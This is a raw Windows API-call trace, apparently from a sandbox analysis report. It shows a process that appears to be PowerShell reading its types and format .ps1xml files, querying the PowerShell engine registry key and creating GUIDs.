	[0149.499] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.499] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.499] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.499] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.500] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.500] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.503] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.503] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.503] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.503] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.504] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.504] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.504] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.504] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.505] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.505] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.505] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.505] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.506] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.506] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.506] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.506] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.511] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.511] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.933] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.934] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.935] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1000, lpOverlapped=0x0) returned 1
	[0149.935] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x1b4, lpOverlapped=0x0) returned 1
	[0149.935] ReadFile (in: hFile=0x32c, lpBuffer=0x2c218f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dd078, lpOverlapped=0x0 | out: lpBuffer=0x2c218f0*, lpNumberOfBytesRead=0x1dd078*=0x0, lpOverlapped=0x0) returned 1
	[0149.935] CloseHandle (hObject=0x32c) returned 1
	[0149.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.935] SetErrorMode (uMode=0x1) returned 0x1
	[0149.935] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1dcff0 | out: lpFileInformation=0x1dcff0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1
	[0149.935] SetErrorMode (uMode=0x1) returned 0x1
	[0149.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.936] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dd0d8 | out: phkResult=0x1dd0d8*=0x32c) returned 0x0
	[0149.936] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd05c, lpData=0x0, lpcbData=0x1dd058*=0x0 | out: lpType=0x1dd05c*=0x1, lpData=0x0, lpcbData=0x1dd058*=0x56) returned 0x0
	[0149.936] CoTaskMemAlloc (cb=0x5a) returned 0x470130
	[0149.936] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dd02c, lpData=0x470130, lpcbData=0x1dd028*=0x56 | out: lpType=0x1dd02c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1dd028*=0x56) returned 0x0
	[0149.936] CoTaskMemFree (pv=0x470130) 
	[0149.936] RegCloseKey (hKey=0x32c) returned 0x0
	[0149.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcd20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0149.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcbd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37
	[0159.440] VirtualQuery (in: lpAddress=0x1dbdc0, lpBuffer=0x1dcc80, dwLength=0x30 | out: lpBuffer=0x1dcc80*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.441] VirtualQuery (in: lpAddress=0x1dbdc0, lpBuffer=0x1dcc80, dwLength=0x30 | out: lpBuffer=0x1dcc80*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.443] VirtualQuery (in: lpAddress=0x1dbdc0, lpBuffer=0x1dcc80, dwLength=0x30 | out: lpBuffer=0x1dcc80*(BaseAddress=0x1db000, AllocationBase=0x160000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0159.448] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0159.449] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0159.449] CoTaskMemFree (pv=0x3c3ed0) 
	[0160.060] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0160.060] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.066] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0160.066] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.069] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0160.069] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.071] CoTaskMemAlloc (cb=0x104) returned 0x3c3ed0
	[0160.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0160.136] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.155] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.186] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.190] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.195] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0160.200] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x9e2, lpOverlapped=0x0) returned 1
	[0160.203] ReadFile (in: hFile=0x32c, lpBuffer=0x32cb0ea, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cb0ea*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0160.205] ReadFile (in: hFile=0x32c, lpBuffer=0x32cbba0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32cbba0*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0160.581] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x1ae7158, Data2=0x9320, Data3=0x41ef, Data4=([0]=0xb1, [1]=0x33, [2]=0x24, [3]=0x73, [4]=0x55, [5]=0x28, [6]=0x26, [7]=0xaa))) returned 0x0
	[0160.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0160.583] SetErrorMode (uMode=0x1) returned 0x1
	[0160.583] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0160.916] GetFileType (hFile=0x32c) returned 0x1
	[0160.916] SetErrorMode (uMode=0x1) returned 0x1
	[0160.916] GetFileType (hFile=0x32c) returned 0x1
	[0160.916] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0161.029] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0161.072] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0161.073] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0161.073] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0161.074] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0xfb2, lpOverlapped=0x0) returned 1
	[0161.074] ReadFile (in: hFile=0x32c, lpBuffer=0x32f5e22, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f5e22*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0161.075] ReadFile (in: hFile=0x32c, lpBuffer=0x32f6708, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x32f6708*, lpNumberOfBytesRead=0x1dcde8*=0x0, lpOverlapped=0x0) returned 1
	[0161.075] CloseHandle (hObject=0x32c) returned 1
	[0161.930] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcb30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0161.930] SetErrorMode (uMode=0x1) returned 0x1
	[0161.930] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1dcd90 | out: lpFileInformation=0x1dcd90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0163.973] SetErrorMode (uMode=0x1) returned 0x1
	[0163.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0163.973] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1dce78 | out: phkResult=0x1dce78*=0x32c) returned 0x0
	[0163.974] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dcdfc, lpData=0x0, lpcbData=0x1dcdf8*=0x0 | out: lpType=0x1dcdfc*=0x1, lpData=0x0, lpcbData=0x1dcdf8*=0x56) returned 0x0
	[0163.974] CoTaskMemAlloc (cb=0x5a) returned 0x4708a0
	[0163.974] RegQueryValueExW (in: hKey=0x32c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1dcdcc, lpData=0x4708a0, lpcbData=0x1dcdc8*=0x56 | out: lpType=0x1dcdcc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1dcdc8*=0x56) returned 0x0
	[0163.974] CoTaskMemFree (pv=0x4708a0) 
	[0163.974] RegCloseKey (hKey=0x32c) returned 0x0
	[0163.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dcac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0163.974] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dc970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0163.976] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x92761f40, Data2=0xb68a, Data3=0x4382, Data4=([0]=0xbb, [1]=0xcf, [2]=0xc5, [3]=0xe0, [4]=0x20, [5]=0xff, [6]=0x9d, [7]=0x63))) returned 0x0
	[0163.980] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0xdace05ae, Data2=0x18e8, Data3=0x424b, Data4=([0]=0x83, [1]=0xe8, [2]=0xf7, [3]=0x80, [4]=0x65, [5]=0x6c, [6]=0xc3, [7]=0xec))) returned 0x0
	[0163.982] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x58ad1a6, Data2=0xb032, Data3=0x4339, Data4=([0]=0x92, [1]=0xdc, [2]=0x37, [3]=0x99, [4]=0xd8, [5]=0x61, [6]=0x19, [7]=0x46))) returned 0x0
	[0163.982] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0xaadfaa8, Data2=0xb6a2, Data3=0x4f3d, Data4=([0]=0x97, [1]=0xbd, [2]=0xe2, [3]=0xd9, [4]=0x6c, [5]=0x59, [6]=0xfd, [7]=0x48))) returned 0x0
	[0163.983] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x704c5687, Data2=0xa6d, Data3=0x48ec, Data4=([0]=0x90, [1]=0x15, [2]=0x91, [3]=0xb7, [4]=0x76, [5]=0x28, [6]=0x1e, [7]=0x32))) returned 0x0
	[0163.984] CoCreateGuid (in: pguid=0x1dd0a0 | out: pguid=0x1dd0a0*(Data1=0x963854f9, Data2=0x8c7c, Data3=0x4042, Data4=([0]=0xa3, [1]=0x1b, [2]=0xb, [3]=0x3b, [4]=0xad, [5]=0x7b, [6]=0x49, [7]=0x70))) returned 0x0
	[0163.984] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1dc860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0163.984] SetErrorMode (uMode=0x1) returned 0x1
	[0163.984] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x32c
	[0163.985] GetFileType (hFile=0x32c) returned 0x1
	[0163.985] SetErrorMode (uMode=0x1) returned 0x1
	[0163.985] GetFileType (hFile=0x32c) returned 0x1
	[0163.985] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.986] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.987] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0163.987] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0164.000] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0164.000] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0x1000, lpOverlapped=0x0) returned 1
	[0164.000] ReadFile (in: hFile=0x32c, lpBuffer=0x3342468, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1dcde8, lpOverlapped=0x0 | out: lpBuffer=0x3342468*, lpNumberOfBytesRead=0x1dcde8*=0xaca, lpOverlapped=0x0) returned 1
